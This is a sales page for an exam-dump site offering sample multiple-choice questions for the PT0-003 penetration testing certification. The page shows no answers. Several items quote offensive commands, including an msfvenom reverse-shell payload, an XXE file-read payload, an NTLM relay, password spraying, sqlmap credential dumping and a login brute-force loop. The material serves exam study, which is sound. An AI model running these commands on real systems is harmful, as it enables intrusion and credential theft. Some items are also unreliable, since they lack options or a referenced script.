Summer Sale - Limited Time 65% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: 65percent

Welcome To DumpsPedia

PT0-003 Sample Questions Answers

Questions 4

A penetration tester is conducting an assessment of offline systems that control a power plant. The tester is looking for vulnerabilities observable in the network stack. The rules of engagement state that the tester cannot interact with production systems. Which of the following tools or techniques should the tester use for the assessment?

Options:

A.

Port mirroring

B.

Storyboarding

C.

Write blocker

D.

SAST tool

Buy Now
Questions 5

While performing a penetration test, a tester executes the following command:

PS c:\tools > c:\hacks\PsExec.exe \\server01.cor.ptia.org -accepteula cmd.exe

Which of the following best explains what the tester is trying to do?

Options:

A.

Test connectivity using PsExec on the server01 using cmd.exe

B.

Perform a lateral movement attack using PsExec

C.

Send the PsExec binary file to the server01 using cmd.exe

D.

Enable cmd.exe on the server01 through PsExec

Buy Now
Questions 6

A penetration tester successfully clones a source code repository and then runs the following command:

find . -type f -exec egrep -i " token|key|login " {} \;

Which of the following is the penetration tester conducting?

Options:

A.

Data tokenization

B.

Secrets scanning

C.

Password spraying

D.

Source code analysis

Buy Now
Questions 7

Which of the following methods should a physical penetration tester employ to access a rarely used door that has electronic locking mechanisms?

Options:

A.

Lock picking

B.

Impersonating

C.

Jamming

D.

Tailgating

E.

Bypassing

Buy Now
Questions 8

A penetration tester needs to evaluate the order in which the next systems will be selected for testing. Given the following output:

Hostname | IP address | CVSS 2.0 | EPSS

hrdatabase | 192.168.20.55 | 9.9 | 0.50

financesite | 192.168.15.99 | 8.0 | 0.01

legaldatabase | 192.168.10.2 | 8.2 | 0.60

fileserver | 192.168.125.7 | 7.6 | 0.90

Which of the following targets should the tester select next?

Options:

A.

fileserver

B.

hrdatabase

C.

legaldatabase

D.

financesite

Buy Now
Questions 9

A penetration tester has found a web application that is running on a cloud virtual machine instance. Vulnerability scans show a potential SSRF for the same application URL path with an injectable parameter. Which of the following commands should the tester run to successfully test for secrets exposure exploitability?

Options:

C.

curl ' < url > ?param= < script > alert(1) < script > / '

D.

curl < url > ?param=http://127.0.0.1/

Buy Now
Questions 10

A penetration tester wants to create a malicious QR code to assist with a physical security assessment. Which of the following tools has the built-in functionality most likely needed for this task?

Options:

A.

BeEF

B.

John the Ripper

C.

ZAP

D.

Evilginx

Buy Now
Questions 11

As part of a penetration test, a tester needs to discover systems in the OT-segmented network. The tester should not disrupt OT services and must minimize device interaction. Which of the following should the penetration tester do?

Options:

A.

Collect data from the OT devices by physically assessing the OT environment.

B.

Perform a passive network capture process for a fixed period of time.

C.

Configure a vulnerability scan engine with low-impact flags and options.

D.

Deploy agents on the OT workstations to scan the other devices.

Buy Now
Questions 12

A penetration tester needs to use the native binaries on a system in order to download a file from the internet and evade detection. Which of the following tools would the tester most likely use?

Options:

A.

netsh.exe

B.

certutil.exe

C.

nc.exe

D.

cmdkey.exe

Buy Now
Questions 13

While performing reconnaissance, a penetration tester attempts to identify publicly accessible ICS (Industrial Control Systems) and IoT (Internet of Things) systems. Which of the following tools is most effective for this task?

Options:

A.

theHarvester

B.

Shodan

C.

Amass

D.

Nmap

Buy Now
Questions 14

A penetration tester successfully gained access to manage resources and services within the company ' s cloud environment. This was achieved by exploiting poorly secured administrative credentials that had extensive permissions across the network. Which of the following credentials was the tester able to obtain?

Options:

A.

IAM credentials

B.

SSH key for cloud instance

C.

Cloud storage credentials

D.

Temporary security credentials (STS)

Buy Now
Questions 15

A penetration tester is researching a path to escalate privileges. While enumerating current user privileges, the tester observes the following:

SeAssignPrimaryTokenPrivilege Disabled

SeIncreaseQuotaPrivilege Disabled

SeChangeNotifyPrivilege Enabled

SeManageVolumePrivilege Enabled

SeImpersonatePrivilege Enabled

SeCreateGlobalPrivilege Enabled

SeIncreaseWorkingSetPrivilege Disabled

Which of the following privileges should the tester use to achieve the goal?

Options:

A.

SeImpersonatePrivilege

B.

SeCreateGlobalPrivilege

C.

SeChangeNotifyPrivilege

D.

SeManageVolumePrivilege

Buy Now
Questions 16

After obtaining a reverse shell, a penetration tester identifies a locally cloned Git repository that contains thousands of files and directories on a Windows machine. The tester suspects there could be sensitive information related to “ProjectX.” Which of the following commands should the tester use in a script to identify potential files to produce the best results?

Options:

A.

gc * | select " ProjectX "

B.

dir /R | findstr " ProjectX "

C.

Get-ChildItem * | Select-String " ProjectX "

D.

gci -Path . -Recurse | Select-String -Pattern " ProjectX "

Buy Now
Questions 17

A penetration tester executes multiple enumeration commands to find a path to escalate privileges. Given the following command:

find / -user root -perm -4000 -exec ls -ldb {} \; 2 > /dev/null

Which of the following is the penetration tester attempting to enumerate?

Options:

A.

Attack path mapping

B.

API keys

C.

Passwords

D.

Permission

Buy Now
Questions 18

A company wants to perform a BAS (Breach and Attack Simu-lation) to measure the efficiency of the corporate security controls. Which of the following would most likely help the tester with simple command examples?

Options:

A.

Infection Monkey

B.

Exploit-DB

C.

Atomic Red Team

D.

Mimikatz

Buy Now
Questions 19

A tester plans to perform an attack technique over a compromised host. The tester prepares a payload using the following command:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f csharp

The tester then takes the shellcode from the msfvenom command and creates a file called evil.xml. Which of the following commands would most likely be used by the tester to continue with the attack on the host?

Options:

A.

regsvr32 /s /n /u C:\evil.xml

B.

MSBuild.exe C:\evil.xml

C.

mshta.exe C:\evil.xml

D.

AppInstaller.exe C:\evil.xml

Buy Now
Questions 20

A penetration tester receives the following output when enumerating a local user:

User compromised_user may run the following commands on localhost:

root (NO PASSWD): /bin/vim

The tester suspects that another host on the same subnet is also vulnerable. Which of the following is the best method to validate whether the other host is vulnerable?

Options:

A.

ssh compromised_user@victimhost " vim; echo $? "

B.

ssh compromised_user@victimhost " sudo -l "

C.

ssh compromised_user@victimhost " bash -c vim "

D.

ssh compromised_user@victimhost " ls -lah /bin/vim "

Buy Now
Questions 21

A penetration tester is unable to identify the Wi-Fi SSID on a client’s cell phone.

Which of the following techniques would be most effective to troubleshoot this issue?

Options:

A.

Sidecar scanning

B.

Channel scanning

C.

Stealth scanning

D.

Static analysis scanning

Buy Now
Questions 22

A penetration tester finds that an application responds with the contents of the /etc/passwd file when the following payload is sent:

xml

Copy code

< ?xml version= " 1.0 " ? >

< !DOCTYPE data [

< !ENTITY foo SYSTEM " file:///etc/passwd " >

] >

< test > & foo; < /test >

Which of the following should the tester recommend in the report to best prevent this type of vulnerability?

Options:

A.

Drop all excessive file permissions with chmod o-rwx.

B.

Ensure the requests application access logs are reviewed frequently.

C.

Disable the use of external entities.

D.

Implement a WAF to filter all incoming requests.

Buy Now
Questions 23

A penetration tester must gain entry to a client ' s office building without raising attention. Which of the following should be the tester ' s first step?

Options:

A.

Interacting with security employees to clone a badge

B.

Trying to enter the back door after hours on a weekend

C.

Collecting building blueprints to run a site survey

D.

Conducting surveillance of the office to understand foot traffic

Buy Now
Questions 24

A tester obtains access to an endpoint subnet and wants to move laterally in the network. Given the following output:

kotlin

Copy code

Nmap scan report for some_host

Host is up (0.01 latency).

PORT STATE SERVICE

445/tcp open microsoft-ds

Host script results: smb2-security-mode: Message signing disabled

Which of the following command and attack methods is the most appropriate for reducing the chances of being detected?

Options:

A.

responder -T eth0 -dwv ntlmrelayx.py -smb2support -tf < target >

B.

msf > use exploit/windows/smb/ms17_010_psexec msf > < set options > msf > run

C.

hydra -L administrator -P /path/to/passwdlist smb:// < target >

D.

nmap —script smb-brute.nse -p 445 < target >

Buy Now
Questions 25

A penetration tester completes a scan and sees the following Nmap output on a host:

Nmap scan report for victim (10.10.10.10)

Host is up (0.0001s latency)

PORT STATE SERVICE

161/udp open snmp

445/tcp open microsoft-ds

3389/tcp open ms-wbt-server

Running Microsoft Windows 7

OS CPE: cpe:/o:microsoft:windows_7::sp0

The tester wants to obtain shell access. Which of the following related exploits should the tester try first?

Options:

A.

exploit/windows/smb/psexec

B.

exploit/windows/smb/ms08_067_netapi

C.

exploit/windows/smb/ms17_010_eternalblue

D.

auxiliary/scanner/snmp/snmp_login

Buy Now
Questions 26

During an engagement, a penetration tester found some weaknesses that were common across the customer’s entire environment. The weaknesses included the following:

Weaker password settings than the company standard

Systems without the company ' s endpoint security software installed

Operating systems that were not updated by the patch management system

Which of the following recommendations should the penetration tester provide to address the root issue?

Options:

A.

Add all systems to the vulnerability management system.

B.

Implement a configuration management system.

C.

Deploy an endpoint detection and response system.

D.

Patch the out-of-date operating systems.

Buy Now
Questions 27

A penetration tester is trying to execute a post-exploitation activity and creates the follow script:

Which of the following best describes the tester ' s objective?

Options:

A.

To download data from an API endpoint

B.

To download data from a cloud storage

C.

To exfiltrate data over alternate data streams

D.

To exfiltrate data to cloud storage

Buy Now
Questions 28

Which of the following scenarios would most likely lead a client to reprioritize goals after a penetration test begins?

Options:

A.

An end-of-life web server is decommissioned.

B.

A new zero-day vulnerability is publicly disclosed.

C.

The penetration tester is not capturing artifacts for an exploited vulnerability.

D.

A new lead penetration tester is assigned to the project.

Buy Now
Questions 29

A penetration tester enters an invalid user ID on the login page of a web application. The tester receives a message indicating the user is not found. Then, the tester tries a valid user ID but an incorrect password, but the web application indicates the password is invalid. Which of the following should the tester attempt next?

Options:

A.

Error log analysis

B.

DoS attack

C.

Enumeration

D.

Password dictionary attack

Buy Now
Questions 30

A penetration tester discovers evidence of an advanced persistent threat on the network that is being tested. Which of the following should the tester do next?

Options:

A.

Report the finding.

B.

Analyze the finding.

C.

Remove the threat.

D.

Document the finding and continue testing.

Buy Now
Questions 31

A tester performs a vulnerability scan and identifies several outdated libraries used within the customer SaaS product offering. Which of the following types of scans did the tester use to identify the libraries?

Options:

A.

IAST

B.

SBOM

C.

DAST

D.

SAST

Buy Now
Questions 32

A penetration tester is getting ready to conduct a vulnerability scan as part of the testing process. The tester will evaluate an environment that consists of a container orchestration cluster. Which of the following tools should the tester use to evaluate the cluster?

Options:

A.

Trivy

B.

Nessus

C.

Grype

D.

Kube-hunter

Buy Now
Questions 33

Which of the following best describes the importance of including the attack steps in a penetration test report?

Options:

A.

It easily provides the recommended mitigations.

B.

It ensures results can be independently verified.

C.

It proves the penetration tester’s competency to the customer.

D.

It demonstrates the difficulty of exploiting specific vulnerabilities in the kill chain.

Buy Now
Questions 34

A penetration tester identifies the following open ports during a network enumeration scan:

PORT STATE SERVICE

22/tcp open ssh

80/tcp open http

111/tcp open rpcbind

443/tcp open https

27017/tcp open mongodb

50123/tcp open ms-rpc

Which of the following commands did the tester use to get this output?

Options:

A.

nmap -Pn -A 10.10.10.10

B.

nmap -sV 10.10.10.10

C.

nmap -Pn -w 10.10.10.10

D.

nmap -sV -Pn -p- 10.10.10.10

Buy Now
Questions 35

Which of the following techniques is the best way to avoid detection by data loss prevention tools?

Options:

A.

Encoding

B.

Compression

C.

Encryption

D.

Obfuscation

Buy Now
Questions 36

A penetration tester observes the following output from an Nmap command while attempting to troubleshoot connectivity to a Linux server:

Starting Nmap 7.91 ( https://nmap.org ) at 2024-01-10 12:00 UTC

Nmap scan report for example.com (192.168.1.10)

Host is up (0.001s latency).

Not shown: 9999 closed ports

PORT STATE SERVICE

21/tcp open ftp

80/tcp open http

135/tcp open msrpc

139/tcp open netbios-ssn

443/tcp open https

2222/tcp open ssh

444/tcp open microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds

Which of the following is the most likely reason for the connectivity issue?

Options:

A.

The SSH service is running on a different port.

B.

The SSH service is blocked by a firewall.

C.

The SSH service requires certificate authentication.

D.

The SSH service is not active.

Buy Now
Questions 37

A penetration tester is testing a power plant ' s network and needs to avoid disruption to the grid. Which of the following methods is most appropriate to identify vulnerabilities in the network?

Options:

A.

Configure a network scanner engine and execute the scan.

B.

Execute a testing framework to validate vulnerabilities on the devices.

C.

Configure a port mirror and review the network traffic.

D.

Run a network mapper tool to get an understanding of the devices.

Buy Now
Questions 38

Which of the following protocols would a penetration tester most likely utilize to exfiltrate data covertly and evade detection?

Options:

A.

FTP

B.

HTTPS

C.

SMTP

D.

DNS

Buy Now
Questions 39

A penetration tester plans to conduct reconnaissance during an engagement using readily available resources. Which of the following resources would most likely identify hardware and software being utilized by the client?

Options:

A.

Cryptographic flaws

B.

Protocol scanning

C.

Cached pages

D.

Job boards

Buy Now
Questions 40

A tester gains initial access to a server and needs to enumerate all corporate domain DNS records. Which of the following commands should the tester use?

Options:

A.

dig +short A AAAA local.domain

B.

nslookup local.domain

C.

dig axfr @local.dns.server

D.

nslookup -server local.dns.server local.domain *

Buy Now
Questions 41

Which of the following explains the reason a tester would opt to use DREAD over PTES during the planning phase of a penetration test?

Options:

A.

The tester is conducting a web application test.

B.

The tester is assessing a mobile application.

C.

The tester is evaluating a thick client application.

D.

The tester is creating a threat model.

Buy Now
Questions 42

During an assessment, a penetration tester wants to extend the vulnerability search to include the use of dynamic testing. Which of the following tools should the tester use?

Options:

A.

Mimikatz

B.

ZAP

C.

OllyDbg

D.

SonarQube

Buy Now
Questions 43

A penetration tester is developing the rules of engagement for a potential client. Which of the following would most likely be a function of the rules of engagement?

Options:

A.

Testing window

B.

Terms of service

C.

Authorization letter

D.

Shared responsibilities

Buy Now
Questions 44

A company hires a penetration tester to test the security implementation of its wireless networks. The main goal for this assessment is to intercept and get access to sensitive data from the company ' s employees. Which of the following tools should the security professional use to best accomplish this task?

Options:

A.

Metasploit

B.

WiFi-Pumpkin

C.

SET

D.

theHarvester

E.

WiGLE.net

Buy Now
Questions 45

A penetration tester is configuring a vulnerability management solution to perform credentialed scans of an Active Directory server. Which of the following account types should the tester provide to the scanner?

Options:

A.

Read-only

B.

Domain administrator

C.

Local user

D.

Root

Buy Now
Questions 46

During an external penetration test, a tester receives the following output from a tool:

test.comptia.org

info.comptia.org

vpn.comptia.org

exam.comptia.org

Which of the following commands did the tester most likely run to get these results?

Options:

A.

nslookup -type=SOA comptia.org

B.

amass enum -passive -d comptia.org

C.

nmap -Pn -sV -vv -A comptia.org

D.

shodan host comptia.org

Buy Now
Questions 47

A penetration tester finds that an application responds with the contents of the /etc/passwd file when the following payload is sent:

< ?xml version= " 1.0 " ? >

< !DOCTYPE data [ < !ENTITY foo SYSTEM " file:///etc/passwd " > ] >

< test > & foo; < /test >

Which of the following should the tester recommend in the report to best prevent this type of vulnerability?

Options:

A.

Drop all excessive file permissions with chmod o-rwx

B.

Ensure the requests application access logs are reviewed frequently

C.

Disable the use of external entities

D.

Implement a WAF to filter all incoming requests

Buy Now
Questions 48

While performing an internal assessment, a tester uses the following command:

crackmapexec smb 192.168.1.0/24 -u user.txt -p Summer123@

Which of the following is the main purpose of the command?

Options:

A.

To perform a pass-the-hash attack over multiple endpoints within the internal network

B.

To perform common protocol scanning within the internal network

C.

To perform password spraying on internal systems

D.

To execute a command in multiple endpoints at the same time

Buy Now
Questions 49

During a penetration test, the tester gains full access to the application ' s source code. The application repository includes thousands of code files. Given that the assessment timeline is very short, which of the following approaches would allow the tester to identify hard-coded credentials most effectively?

Options:

A.

Run TruffleHog against a local clone of the application

B.

Scan the live web application using Nikto

C.

Perform a manual code review of the Git repository

D.

Use SCA software to scan the application source code

Buy Now
Questions 50

An internal penetration tester is on site assessing network access for company-owned mobile devices. Which of the following would be the best tool to identify the available networks?

Options:

A.

Wireshark

B.

theHarvester

C.

Recon-ng

D.

WiGLE.net

Buy Now
Questions 51

Which of the following technologies is most likely used with badge cloning? (Select two).

Options:

A.

NFC

B.

RFID

C.

Bluetooth

D.

Modbus

E.

Zigbee

F.

CAN bus

Buy Now
Questions 52

An external legal firm is conducting a penetration test of a large corporation. Which of the following would be most appropriate for the legal firm to use in the subject line of a weekly email update?

Options:

A.

Privileged & Confidential Status Update

B.

Action Required Status Update

C.

Important Weekly Status Update

D.

Urgent Status Update

Buy Now
Questions 53

A penetration testing company is defining the rules of engagement with a client. Which of the following should the company include?

Options:

A.

Non-disclosure agreement

B.

Escalation process

C.

URL list

D.

Authorization letter

Buy Now
Questions 54

A penetration tester gains access to a host with many applications that load at startup and run as SYSTEM. The penetration tester runs a command and receives the following output:

User accounts for \COMPTIA-Host

CompTIA User DefaultAccount Guest

CompTIA Admin CompTIA Accountant

The command completed successfully.

Which of the following attacks will most likely allow the penetration tester to escalate privileges?

Options:

A.

Credential dumping

B.

Local file inclusion

C.

Unquoted service path injection

D.

Process hijacking

Buy Now
Questions 55

A penetration tester is performing an authorized physical assessment. During the test, the tester observes an access control vestibule and on-site security guards near the entry door in the lobby. Which of the following is the best attack plan for the tester to use in order to gain access to the facility?

Options:

A.

Clone badge information in public areas of the facility to gain access to restricted areas.

B.

Tailgate into the facility during a very busy time to gain initial access.

C.

Pick the lock on the rear entrance to gain access to the facility and try to gain access.

D.

Drop USB devices with malware outside of the facility in order to gain access to internal machines.

Buy Now
Questions 56

A penetration tester conducts a web application assessment and receives the following Set-Cookie upon logging in:

Set-Cookie auth=UGVudGVzdFVzZXI6OTE1MzYK

Upon analysis, the penetration tester determines this is a Base64-encoded string, which when decoded reads:

Pentestuser:91536

The penetration tester logs out, logs back in, and sees the decoded string now reads:

Pentestuser:91944

Which of the following attacks will the penetration tester most likely conduct based on this information?

Options:

A.

Collision attack

B.

JWT manipulation

C.

Session hijacking

D.

Insecure direct object reference

Buy Now
Questions 57

A penetration tester conducts a scan on an exposed Linux web server and gathers the following data:

Host: 192.168.55.23

Open Ports:

22/tcp Open OpenSSH 7.2p2 Ubuntu 4ubuntu2.10

80/tcp Open Apache httpd 2.4.18 (Ubuntu)

111/tcp Open rpcbind 2-4 (RPC #100000)

Additional notes:

Directory listing enabled on /admin

Apache mod_cgi enabled

No authentication required to access /cgi-bin/debug.sh

X-Powered-By: PHP/5.6.40-0+deb8u12

Which of the following is the most effective action to take?

Options:

A.

Launch a payload using msfvenom and upload it to the /admin directory.

B.

Review the contents of /cgi-bin/debug.sh.

C.

Use Nikto to scan the host and port 80.

D.

Attempt a brute-force attack against OpenSSH 7.2p2.

Buy Now
Questions 58

Which of the following is the most efficient way to exfiltrate a file containing data that could be sensitive?

Options:

A.

Use steganography and send the file over FTP.

B.

Compress the file and send it using TFTP.

C.

Split the file in tiny pieces and send it over dnscat.

D.

Encrypt and send the file over HTTPS.

Buy Now
Questions 59

A penetration tester compromises a developer’s workstation and believes the individual may have access to Amazon cloud compute resources. Which of the following commands is least likely to trigger SOC detections to confirm access?

Options:

A.

aws sts get-caller-identity

B.

aws connect describe-user

C.

aws ec2 describe-instances --dry-run

D.

aws cloud9 list-environments --max-items 1

Buy Now
Questions 60

During a red-team exercise, a penetration tester obtains an employee ' s access badge. The tester uses the badge’s information to create a duplicate for unauthorized entry.

Which of the following best describes this action?

Options:

A.

Smurfing

B.

Credential stuffing

C.

RFID cloning

D.

Card skimming

Buy Now
Questions 61

A tester compromises a target host and then wants to maintain persistent access. Which of the following is the best way for the attacker to accomplish the objective?

Options:

A.

Configure and register a service.

B.

Install and run remote desktop software.

C.

Set up a script to be run when users log in.

D.

Perform a kerberoasting attack on the host.

Buy Now
Questions 62

A penetration tester cannot complete a full vulnerability scan because the client ' s WAF is blocking communications. During which of the following activities should the penetration tester discuss this issue with the client?

Options:

A.

Goal reprioritization

B.

Peer review

C.

Client acceptance

D.

Stakeholder alignment

Buy Now
Questions 63

A company ' s incident response team determines that a breach occurred because a penetration tester left a web shell. Which of the following should the penetration tester have done after the engagement?

Options:

A.

Enable a host-based firewall on the machine

B.

Remove utilized persistence mechanisms on client systems

C.

Revert configuration changes made during the engagement

D.

Turn off command-and-control infrastructure

Buy Now
Questions 64

You are a security analyst tasked with hardening a web server.

You have been given a list of HTTP payloads that were flagged as malicious.

INSTRUCTIONS

Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Buy Now
Questions 65

A penetration tester wants to use the following Bash script to identify active servers on a network:

1 network_addr= " 192.168.1 "

2 for h in {1..254}; do

3 ping -c 1 -W 1 $network_addr.$h > /dev/null

4 if [ $? -eq 0 ]; then

5 echo " Host $h is up "

6 else

7 echo " Host $h is down "

8 fi

9 done

Which of the following should the tester do to modify the script?

Options:

A.

Change the condition on line 4.

B.

Add 2 > & 1 at the end of line 3.

C.

Use seq on the loop on line 2.

D.

Replace $h with ${h} on line 3.

Buy Now
Questions 66

A penetration tester needs to complete cleanup activities from the testing lead. Which of the following should the tester do to validate that reverse shell payloads are no longer running?

Options:

A.

Run scripts to terminate the implant on affected hosts.

B.

Spin down the C2 listeners.

C.

Restore the firewall settings of the original affected hosts.

D.

Exit from C2 listener active sessions.

Buy Now
Questions 67

A penetration tester establishes a remote session to a host and receives the following prompt: rpcclient . Which of the following is the tester most likely able to do?

Options:

A.

Query local users on the system.

B.

Obtain SAM database password hashes.

C.

Enumerate session tokens.

D.

Change the Resultant Set of Group Policy applied in AD.

Buy Now
Questions 68

Testing and reporting activities are complete. A penetration tester needs to verify that exploited systems have been restored to preengagement conditions. Which of the following would be most appropriate for the tester to do?

Options:

A.

Terminate the running command-and-control payload.

B.

Provide the customer with a list of the changes made.

C.

Replace environment variables with their original values.

D.

Put in a change request ticket to reimage the system.

Buy Now
Questions 69

Which of the following would most likely reduce the possibility of a client rejecting the final deliverable for a penetration test?

Options:

A.

Goal reprioritization

B.

Stakeholder alignment

C.

Non-disclosure agreement

D.

Business impact analysis

Buy Now
Questions 70

Which of the following describes the process of determining why a vulnerability scanner is not providing results?

Options:

A.

Root cause analysis

B.

Secure distribution

C.

Peer review

D.

Goal reprioritization

Buy Now
Questions 71

A penetration tester is conducting reconnaissance on a target network. The tester runs the following Nmap command: nmap -sv -sT -p - 192.168.1.0/24. Which of the following describes the most likely purpose of this scan?

Options:

A.

OS fingerprinting

B.

Attack path mapping

C.

Service discovery

D.

User enumeration

Buy Now
Questions 72

A penetration tester wants to collect credentials against an organization with a PEAP infrastructure. Which of the following tools should the tester use?

Options:

A.

InSSIDer

B.

HackRF One

C.

WiFi-Pumpkin

D.

Aircrack-ng

Buy Now
Questions 73

A penetration tester wants to expand access into a network by enumerating users and credentials. The tester runs some tools for enumeration and captures the following information:

[SMB] Client: 10.203.10.14

[SMB] Username: comptiaadmin

[SMB] Hash: 10.203.20.16:a96409231c099f17

Which of the following steps should the penetration tester take next?

Options:

A.

Use Hydra to brute-force passwords with the captured username.

B.

Utilize the auxiliary/server/http_ntlmrelay module in Metasploit.

C.

Perform a secretsdump with Impacket using the NTLM digest.

D.

Load the hash information into John the Ripper for cracking.

Buy Now
Questions 74

During an assessment, a penetration tester runs the following command:

dnscmd.exe /config /serverlevelplugindll C:\users\necad-TA\Documents\adduser.dll

Which of the following is the penetration tester trying to achieve?

Options:

A.

DNS enumeration

B.

Privilege escalation

C.

Command injection

D.

A list of available users

Buy Now
Questions 75

A penetration tester is performing a security review of a web application. Which of the following should the tester leverage to identify the presence of vulnerable open-source libraries?

Options:

A.

VM

B.

IAST

C.

DAST

D.

SCA

Buy Now
Questions 76

A penetration tester gains initial access to a target system by exploiting a recent RCE vulnerability. The patch for the vulnerability will be deployed at the end of the week. Which of the following utilities would allow the tester to reenter the system remotely after the patch has been deployed? (Select two).

Options:

A.

schtasks.exe

B.

rundll.exe

C.

cmd.exe

D.

chgusr.exe

E.

sc.exe

F.

netsh.exe

Buy Now
Questions 77

A penetration tester obtains a regular domain user ' s set of credentials. The tester wants to attempt a dictionary attack by creating a custom word list based on the Active Directory password policy. Which of the following tools should the penetration tester use to retrieve the password policy?

Options:

A.

Responder

B.

CrackMapExec

C.

Hydra

D.

msfvenom

Buy Now
Questions 78

As part of an engagement, a penetration tester wants to maintain access to a compromised system after rebooting. Which of the following techniques would be best for the tester to use?

Options:

A.

Establishing a reverse shell

B.

Executing a process injection attack

C.

Creating a scheduled task

D.

Performing a credential-dumping attack

Buy Now
Questions 79

During a web application assessment, a penetration tester accesses the site unauthenticated and receives the following Set-Cookie on the first response:

auth=yYKGORbrpabgr842ajbvrpbptau42342

When the tester logs in, the server sends only one Set-Cookie header, and the value is exactly the same as shown above. Which of the following vulnerabilities has the tester discovered?

Options:

A.

JWT manipulation

B.

Cookie poisoning

C.

Session fixation

D.

Collision attack

Buy Now
Questions 80

A penetration tester must identify hosts without alerting an IPS. The tester has access to a local network segment. Which of the following is the most logical action?

Options:

A.

Performing reverse DNS lookups

B.

Utilizing Nmap using a ping sweep

C.

Conducting LLMNR poisoning using Responder

D.

Viewing the local routing table on the host

Buy Now
Questions 81

A penetration tester is evaluating the security of a corporate client’s web application using federated access. Which of the following approaches has the least possibility of blocking the IP address of the tester’s machine?

Options:

A.

for user in $(cat users.txt); dofor pass in $(cat /usr/share/wordlists/rockyou.txt); docurl -sq -XPOST https://example.com/login.asp -d " username=$user & password=$pass " | grep " Welcome " & & echo " OK: $user $pass " done; done

B.

spray365.py generate --password_file passwords.txt --user_file users.txt --domain example.com --delay 1 --execution_plan target.planspray365.py spray target.plan

C.

import requests,pathlibusers=pathlib.Path( " users.txt " ).read_text(); passwords=pathlib.Path( " passwords.txt " ).read_text()for user in user:for pass in passwords:r=requests.post( " https://example.com " ,data=f " username={user} & password={pass} " ,headers={ " user-agent " : " Mozilla/5.0 " })if " Welcome " in r.text:print(f " OK: {user} {pass} " )

D.

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt < domain_ip > http-post-form " /login.asp:username=^USER^ & password=^PASS^:Invalid Password "

Buy Now
Questions 82

A penetration tester conducts reconnaissance for a client ' s network and identifies the following system of interest:

$ nmap -A AppServer1.compita.org

Starting Nmap 7.80 (2023-01-14) on localhost (127.0.0.1) at 2023-08-04 15:32:27

Nmap scan report for AppServer1.compita.org (192.168.1.100)

Host is up (0.001s latency).

Not shown: 999 closed ports

Port State Service

21/tcp open ftp

22/tcp open ssh

23/tcp open telnet

80/tcp open http

135/tcp open msrpc

139/tcp open netbios-ssn

443/tcp open https

445/tcp open microsoft-ds

873/tcp open rsync

8080/tcp open http-proxy

8443/tcp open https-alt

9090/tcp open zeus-admin

10000/tcp open snet-sensor-mgmt

The tester notices numerous open ports on the system of interest. Which of the following best describes this system?

Options:

A.

A honeypot

B.

A Windows endpoint

C.

A Linux server

D.

An already-compromised system

Buy Now
Questions 83

During a security assessment for an internal corporate network, a penetration tester wants to gain unauthorized access to internal resources by executing an attack that uses software to disguise itself as legitimate software. Which of the following host-based attacks should the tester use?

Options:

A.

On-path

B.

Logic bomb

C.

Rootkit

D.

Buffer overflow

Buy Now
Questions 84

During an assessment, a penetration tester exploits an SQLi vulnerability. Which of the following commands would allow the penetration tester to enumerate password hashes?

Options:

A.

sqlmap -u www.example.com/?id=1 --search -T user

B.

sqlmap -u www.example.com/?id=1 --dump -D accounts -T users -C cred

C.

sqlmap -u www.example.com/?id=1 --tables -D accounts

D.

sqlmap -u www.example.com/?id=1 --schema --current-user --current-db

Buy Now
Questions 85

During a penetration test, the tester wants to obtain public information that could be used to compromise the organization ' s cloud infrastructure. Which of the following is the most effective resource for the tester to use for this purpose?

Options:

A.

Sensitive documents on a public cloud

B.

Open ports on the cloud infrastructure

C.

Repositories with secret keys

D.

SSL certificates on websites

Buy Now
Questions 86

Given the following statements:

Implement a web application firewall.

Upgrade end-of-life operating systems.

Implement a secure software development life cycle.

In which of the following sections of a penetration test report would the above statements be found?

Options:

A.

Executive summary

B.

Attack narrative

C.

Detailed findings

D.

Recommendations

Buy Now
Questions 87

A penetration tester finished a security scan and uncovered numerous vulnerabilities on several hosts. Based on the targets ' EPSS and CVSS scores, which of the following targets is the most likely to get attacked?

Host | CVSS | EPSS

Target 1 | 4 | 0.6

Target 2 | 2 | 0.3

Target 3 | 1 | 0.6

Target 4 | 4.5 | 0.4

Options:

A.

Target 1: CVSS Score = 4 and EPSS Score = 0.6

B.

Target 2: CVSS Score = 2 and EPSS Score = 0.3

C.

Target 3: CVSS Score = 1 and EPSS Score = 0.6

D.

Target 4: CVSS Score = 4.5 and EPSS Score = 0.4

Buy Now
Questions 88

A penetration tester performs several Nmap scans against the web application for a client.

INSTRUCTIONS

Click on the WAF and servers to review the results of the Nmap scans. Then click on

each tab to select the appropriate vulnerability and remediation options.

If at any time you would like to bring back the initial state of the simulation, please

click the Reset All button.

Options:

Buy Now
Questions 89

A penetration tester attempts unauthorized entry to the company ' s server room as part of a security assessment. Which of the following is the best technique to manipulate the lock pins and open the door without the original key?

Options:

A.

Plug spinner

B.

Bypassing

C.

Decoding

D.

Raking

Buy Now
Questions 90

A consultant starts a network penetration test. The consultant uses a laptop that is hardwired to the network to try to assess the network with the appropriate tools. Which of the following should the consultant engage first?

Options:

A.

Service discovery

B.

OS fingerprinting

C.

Host discovery

D.

DNS enumeration

Buy Now
Questions 91

A penetration tester modifies a web application’s URL by inserting malformed data into input parameters. The web application returns the error message below:

Internal Server Error

NumberFormatException: For input string ...

Source file: /home/www/htmldoc/app001/140612/main

Which of the following actions will the tester most likely take?

Options:

A.

Perform application dynamic testing.

B.

Tamper with the application’s log files.

C.

Force a remote memory overflow.

D.

Exploit SQL injection vulnerabilities.

Buy Now
Questions 92

During a security assessment, a penetration tester wants to compromise user accounts without triggering IDS/IPS detection rules. Which of the following is the most effective way for the tester to accomplish this task?

Options:

A.

Crack user accounts using compromised hashes.

B.

Brute force accounts using a dictionary attack.

C.

Bypass authentication using SQL injection.

D.

Compromise user accounts using an XSS attack.

Buy Now
Questions 93

A client recently hired a penetration testing firm to conduct an assessment of their consumer-facing web application. Several days into the assessment, the client’s networking team observes a substantial increase in DNS traffic. Which of the following would most likely explain the increase in DNS traffic?

Options:

A.

Covert data exfiltration

B.

URL spidering

C.

HTML scraping

D.

DoS attack

Buy Now
Questions 94

A penetration tester gains access to the target network and observes a running SSH server.

Which of the following techniques should the tester use to obtain the version of SSH running on the target server?

Options:

A.

Network sniffing

B.

IP scanning

C.

Banner grabbing

D.

DNS enumeration

Buy Now
